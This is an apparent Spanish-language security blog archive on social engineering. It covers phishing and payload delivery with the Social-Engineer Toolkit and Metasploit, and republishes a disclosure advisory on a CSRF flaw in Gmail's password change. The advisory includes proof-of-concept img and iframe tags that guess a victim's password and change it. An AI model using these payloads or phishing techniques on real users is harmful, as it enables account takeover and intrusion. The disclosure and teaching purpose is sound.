Mostrando entradas con la etiqueta Ingeniería Social. Mostrar todas las entradas
Mostrando entradas con la etiqueta Ingeniería Social. Mostrar todas las entradas

19 ene. 2011

[Video] Bypaseando Windows 7 x86/64 con SET y Metasploit - Escalando Privilegios

José Antonio Pérez (Japtron) me ha enviado un video excelente que realizó donde nos enseña como obtener una sesión en Windows 7 y como escalar privilegios para llegar a usuario System.

En el video se muestra como mediante SET (Social Engineer Toolkit) duplican una web para que la víctima crea que es la original (Phishing), es ahí cuando se ejecuta un Applet Java malicioso e infecta a la víctima.

Luego desde Metasploit se obtiene la ansiada shell, pero sin privilegios de administrador, vean el video y sepan como escalar privilegios ;). Recomendado 100%

16 nov. 2010

[SET] The Social-Engineer Toolkit

The Social-Engineer Toolkit mas conocido como SET, es un conjunto de herramientas especialmente diseñadas para realizar ataques de Ingeniería Social en procesos de auditorias en seguridad, esta programado en Python por David Kennedy (ReL1K), quien hace poco publicó su versión 1.0 con grandes cambios.

5 ago. 2010

[CSRF] en GMail

I. LA VULNERABILIDAD:

Vulnerabilidad CSRF en el servicio Gmail.

II. ANTECEDENTES:

Gmail es el servicio de correo gratuito de Google. Viene con la tecnología de Googlesearch integrada y más de 2.600 megabytes de almacenamiento (y crece cada día). Se pueden guardar todos los mensajes recibidos, archivos e imágenes para siempre, Gmail tiene una búsqueda rápida y fácil para encontrar cualquier cosa que se esté buscando, entre otros servicios.

III. DESCRIPCIÓN:

Cross-Site Request Forgery, también conocido como  CSRF o XSRF, es una especie de hazaña de los sitios web maliciosos. Aunque este tipo de ataque tiene similitudes con la de cross-site scripting (XSS), cross-site scripting requiere del atacante para inyectar código no autorizado en un sitio web, mientras el CSRF se limitaba a transmitir comandos no autorizados de un usuario sin su permiso.

Gmail es vulnerable a ataques CSRF en la función "Cambiar contraseña". Con sólo una autentificación del usuario la cookie es enviada automáticamente por el navegador y se repite en cada petición sin necesidad de autentificarse denuevo.

Un atacante puede crear una página que incluye las solicitudes a la función de cambio de "contraseña "funcionalidad de GMail y modificar las contraseñas de los usuarios que, estando identificado, visite la página del atacante.

El ataque se facilita ya que la petición "Cambiar contraseña" es realizada a través del método HTTP GET en lugar del método POST que se realiza habitualmente.

IV. PRUEBA DE CONCEPTO:

1. Un atacante crea una página web "csrf-attack.html" que realizan muchas peticiones GET HTTP a la función "Cambiar contraseña".

Por ejemplo, un crackeao de contraseñas de 3 intentos (ver el parámetro "OldPasswd"):
...
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
...

o con marcos ocultos:
...
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
...

El atacante puede utilizar deliberadamente una nueva contraseña débil (ver "passwd" y parámetros "PasswdAgain" ), de esta manera se puede saber si la contraseña es correcta analizados sin necesidad de modificar la contraseña de la víctima.

El uso de contraseñas débiles en "Cambiar contraseña" La respuesta es:
- " The password you gave is incorrect. ", Analizó si la contraseña no es correcta.
- " We're sorry, but you've selected an insecure password. In order
to protect the security of your account, please click "Password
Strength" to get tips on choosing to safer password. ", Analizó si la contraseña es correcta y la contraseña de la víctima no se modifica.

Si el atacante desea modificar la contraseña del usuario víctima, el mensaje de respuesta esperado es: " Your new password has been saved - OK ".

En cualquier caso, el atacante eludr las restricciones impuestas por el captcha en la forma de autenticación.

2. Un usuario autenticado en GMail visita "csrf-attack.html página" controlado por el atacante.

Por ejemplo, el atacante envía un correo electrónico a la víctima (una cuenta de GMail) y provoca que la víctima visita a su página (ingeniería social). Por lo tanto, el atacante se asegura que la víctima se haya autenticado.

3. El robo de contraseñas se ejecuta de forma transparente a la víctima.

V. impacto en las empresas

- Denegación de servicio selectivo en los usuarios del servicio Gmail (cambiar la contraseña de usuario).
- Posible acceso al correo de otros usuarios de GMail.

VI. SISTEMAS AFECTADOS:

Gmail servicio.

VII. SOLUCIÓN:

No hay solución aportada por el fabricante.

VIII. REFERENCIAS:

http://www.gmail.com

IX. CRÉDITOS

Esta vulnerabilidad ha sido descubierta y reportada por
Vicente Aguilera Díaz (vaguilera (a) isecauditors (punto) com).

Fuente: http://seclists.org/

11 mar. 2010

[Metasploit] Explotando vunerabilidades humanas (Ingeniaría Social)

Una de las técnicas empleadas por un atacante durante la fase de reconocimiento es la ingeniería social.

Manipular a las personas para ganar su confianza y obtener acceso a su sistema logrando que nos revele información confidencial es todo un arte. En muchas ocasiones puede resultar más fácil engañar al usuario que encontrar una vulnerabilidad en el sistema.

Todos conocemos la frase: "el usuario es el eslabón más débil", aprovechar sus debilidades para lograr que nos revele la clave de acceso a su sistema o abra un pdf, no es una tarea muy complicada. ¿Quién se resiste a un pdf que contiene un calendario de fotos de chicas sexys? o un supuesto administrador de la red, que nos llama con un número que parece de nuestra compañía utilizando las técnicas de spoofing de números de teléfono y nos informa que ha detectado una infección en nuestra máquina y necesita nuestra contraseña para revisar el problema.

Uno de los expertos en este arte es Kevin Mitnik, quien asegura que aunque los usuarios sigan unas políticas de seguridad, nuestra naturaleza humana nos hace vulnerables. ¿Quién no siente la necesidad de ayudar a un supuesto administrador de sistemas que se ha ganado nuestra confianza previamente?

Desde Metasploit nos presentan The Social-Engineering Toolkit (SET) que fue diseñado para el proyecto Social-Engineering Framework.

Podemos descargarlo desde nuestra Back|Track 4 mediante:
$ svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

Esta toolkit incorpora en una interfaz sencilla varios ataques de ingeniería social, con el propósito de automatizar y mejorar muchos de los ataques que existen en la actualidad.


Permite realizar ataques de tipo:
  1. Ataques vía e-mail
  2. Vector de ataques a sitios web

Además nos da la opción de actualizar nuestro Framework de Metasploit, nuestro Toolkit y la posibilidad de crear nuestro propio Payload y Listener.

Podríamos hacer uso de otra de las técnicas de reconocimiento, como es el Google Hacking y obtener una lista de e-mails de una organización. Seleccionaríamos por ejemplo el ataque mediante e-mail, que nos permitirá crear un pdf que contiene un exploit. Una vez el usuario abre el pdf, el payload se ejecutará y se creará una conexión que nos permitirá acceder a la shell de su máquina.


Otra opción sería llevar al usuario a una página web que muestra un error, y para funcionar necesita cargar un applet, al aceptarlo el applet actúa como troyano.


En definitiva, un proyecto muy interesante en el que solo se echa de menos la posibilidad de escoger los mensajes en otros idiomas aparte del Inglés.

Fuente: http://www.securitybydefault.com/